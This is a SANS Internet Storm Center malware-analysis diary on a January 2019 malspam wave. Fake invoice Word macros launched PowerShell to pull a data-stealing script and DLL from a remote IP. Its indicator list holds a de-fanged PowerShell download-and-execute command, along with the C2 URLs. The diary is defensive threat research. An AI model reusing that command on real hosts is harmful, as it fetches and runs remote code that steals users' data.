Threat Level: green Handler on Duty: Brad Duncan

SANS ISC: Internet Storm Center - SANS Internet Storm Center Internet Storm Center


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Latest Diaries

Malspam with Word docs uses macro to run Powershell script and steal system data

Published: 2019-01-24
Last Updated: 2019-01-24 04:58:01 UTC
by Brad Duncan (Version: 1)
0 comment(s)

Introduction

On Wednesday 2019-01-23 I ran across several hundred items from a wave of malicious spam (malspam).  These emails had an attached Word document with malicious macro code.  Opening the attached Word document and enabling macros would infect a vulnerable Windows host.

The macro code in these Word documents uses Powershell to run a script retrieved from 162.244.32[.]180.  This script is designed to steal system information and other sensitive data, sending it back to 162.244.32[.]180.

There is no mechanism for persistence.  This infection did not survive a reboot or even logging out of an infected user's account.

Today's diary examines the emails and associated infection traffic from this wave of malspam seen on Wednesday 2019-01-23.


Shown above:  Flow chart for infection traffic from this malspam.

The emails

Emails from this wave of malspam used a fake invoice or payment document.  A typical example is shown in the image below.


Shown above:  Example of an email from this wave of malspam.

The infection

Opening the Word document and enabling macros on an infected host ran Windows Powershell on a Windows 7 host in my lab.  This script initially generated an HTTPS traffic to 162.244.32[.]180 ending with ".png" for the URL.  Network traffic generated by this infection did not generate any alerts for me.  However, certificate data for the HTTPS traffic was unusual.  Someone used "WW" for all of the fields to identify the certificate issuer.


Shown above:  Process Hacker displaying information on Powershell activity generated by the Word macro.


Shown above: Using Fiddler to decrypt HTTPS traffic from this infection and review the contents.


Shown above:  Reviewing the infection traffic in Wireshark compared to reviewing it in Fiddler.


Shown above:  Using Wireshark to review certificate data for HTTPS traffic from 162.244.32[.]180.

Base64 strings from the Powershell script

I noticed two very long base64 strings in the script returned from hxxps://162.244.32[.]180/[seven random letters].png.  Decoding these base64 strings revealed two files.  One was a gzip archive that contained a DLL file (tools.dll) run from system RAM.  The other file was text-based script that gathered information from the system, including data from Microsoft Outlook profiles.


Shown above:  tools.dll extracted from base64 code, run from system RAM during this infection.


Shown above:  Script extracted from base64 code used during this infection. 

Indicators of Compromise (IoCs)

The following are indicators for emails from this wave of malspam.  Any malicious URLs, IP addresses, and domain names have been "de-fanged" to avoid issues when viewing today's diary. 

Date/time of the emails:

  • Wednesday 2019-01-23 as early as 09:50 UTC through at least 11:40 UTC

Subject lines:

  • Customer's service complaint
  • Immediate payment requested

Senders:

  • Various email addresses, probably spoofed

Attachment names:

  • complaint (1).doc
  • complaint (2).doc
  • complaint (3).doc
  • complaint (4).doc
  • complaint (5).doc
  • complaint (6).doc
  • complaint (7).doc
  • complaint (8).doc
  • complaint (9).doc
  • complaint (10).doc
  • complaint (11).doc
  • invoice (1).doc
  • invoice (2).doc
  • invoice (3).doc
  • invoice (4).doc
  • invoice (5).doc
  • invoice (6).doc
  • invoice (7).doc
  • invoice (8).doc
  • invoice (9).doc
  • invoice (10).doc
  • invoice (11).doc
  • statement (1).doc
  • statement (2).doc
  • statement (3).doc
  • statement (4).doc
  • statement (5).doc
  • statement (6).doc
  • statement (7).doc
  • statement (8).doc
  • statement (9).doc
  • statement (10).doc
  • statement (11).doc

7 examples of SHA256 hashes for these attached Word documents:

Powershell command after enabling macros on Word document (de-fanged):

C:\Windows\system32\windowspowershell\v1.0\powershell.exe -nop
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};iex
(New-Object System.Net.WebClient).DownloadString('hxxps://162.244.32[.]180/'+(-join
((97..122) | Get-Random -Count 7 | % {[char]$_}))+'.png')


SHA256 hash of malicious script returned from hxxps://162.244.32[.]180/[seven random letters].png caused by the above powershell command:

SHA256 hash of gzip archive from base64 string in above Powershell script:

SHA256 hash of DLL file (tools.dll) extracted from the above gzip archive:

SHA256 hash of more script from base64 string in the above Powershell script:

Example of HTTPS infection traffic (de-fanged):

  • hxxps://162.244.32[.]180/pxnbtoe.png   (the seven letters before .png are random)
  • hxxps://162.244.32[.]180/uv/gu/4ibbkjgfixch/ymb2qkc0gf0ie/gs0o0bruw1qqk/vum2ecvndhbavliy.asp
  • hxxps://162.244.32[.]180/fe/h0w5nnccuatuafe3pei0v4/nt/2mb5/qh5la52bx2ybhrx5waj2n53qcpdm.asp
  • hxxps://162.244.32[.]180/zvnkwicjiwu/f/incqe2b0ap34geojl5s0d/0kp2wyysvhumgevj3dbrfkpiy.jpg
  • hxxps://162.244.32[.]180//r2mdgaila2yhk/3qsx2/roe5jgcbpnozt1/ltlgm4s005l/wowwx03tvvv4xm2.jpg
  • hxxps://162.244.32[.]180/binmgseoax/adz2yqj3vwo54wlhn3lfrs1hkjmm450uts3x4ve2xn5vjhfy.jpg
  • hxxps://162.244.32[.]180/binmgseoax/adz2yqj3vwo54wlhn3lfrs1hkjmm450uts3x4ve2xn5vjhfy.jpg

HTTPS/SSL/TLS certificate issuer data from 162.244.32[.]180:

  • id-at-countryName=WW
  • id-at-stateOrProvinceName=WW
  • id-at-localityName=WW
  • id-at-organizationName=WW
  • id-at-organizationalUnitName=WW
  • id-at-commonName=WW
  • pkcs-9-at-emailAddress=WW@WW.COM

Final words

Pcap and malware/artifacts associated with today's diary can be found here.

---
Brad Duncan
brad [at] malware-traffic-analysis.net

0 comment(s)

If you have more information or corrections regarding our diary, please share.

Recent Diaries

DNS Firewalling with MISP
Jan 22nd 2019
2 days ago by Xme (2 comments)

Suspicious GET Request: Do You Know What This Is?
Jan 21st 2019
2 days ago by DidierStevens (6 comments)

Sextortion Bitcoin on the Move
Jan 18th 2019
5 days ago by John (2 comments)

View All Diaries →

Latest Discussions

sextortion Mail
created Jan 10th 2019
2 weeks ago by Anonymous (0 replies)

Internet security needed!
created Jan 3rd 2019
3 weeks ago by Anonymous (0 replies)

Security industry and Root Cause Analysis
created Dec 28th 2018
3 weeks ago by Anonymous (0 replies)

Disposable e-mail address service sneakemail.com status?
created Dec 26th 2018
4 weeks ago by Anonymous (0 replies)

PDF vs. DOCX in phishing mails
created Dec 14th 2018
1 month ago by sciurium (0 replies)

View All Forums →

Latest News

View All News →

Top Diaries

Wide-scale Petya variant ransomware attack noted
Jun 27th 2017
1 year ago by Brad (6 comments)

Using a Raspberry Pi honeypot to contribute data to DShield/ISC
Aug 3rd 2017
1 year ago by Johannes (13 comments)

Detection Lab: Visibility & Introspection for Defenders
Dec 15th 2017
1 year ago by Russ McRee (2 comments)

Second Google Chrome Extension Banker Malware in Two Weeks
Aug 29th 2017
1 year ago by Renato (0 comments)

Maldoc with auto-updated link
Aug 17th 2017
1 year ago by Xme (2 comments)